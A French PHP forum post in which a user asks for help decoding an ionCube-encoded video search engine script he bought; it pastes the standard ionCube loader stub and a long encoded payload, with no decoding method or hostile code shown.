IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Décryptage d'un script


Sujet :

Langage PHP

  1. #1
    Nouveau Candidat au Club
    Homme Profil pro
    Chargé d'affaire
    Inscrit en
    Février 2014
    Messages
    1
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 33
    Localisation : Maroc

    Informations professionnelles :
    Activité : Chargé d'affaire

    Informations forums :
    Inscription : Février 2014
    Messages : 1
    Points : 1
    Points
    1
    Par défaut Décryptage d'un script
    Salut tout le monde
    je suis nouveau dans cet forum
    je veux profiter de vos expérience pour m'aider a trouver une solution a mon problème
    j'ai acheter récemment un script de vidéos search engine
    mais quand j'ai téléchargé le contenu j’étais choqué par un cryptage par l'ioncube
    c’était un peu résolu mais pas à 100% parce qu’ils existent encore des erreurs dans le code obtenu

    et voila le code original(fichier attaché)

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    <?php //0046b
    if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the website operator. If you are the website operator please use the <a href="http://www.ioncube.com/lw/">ionCube Loader Wizard</a> to assist with installation.');exit(199);
     
    ?>
    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
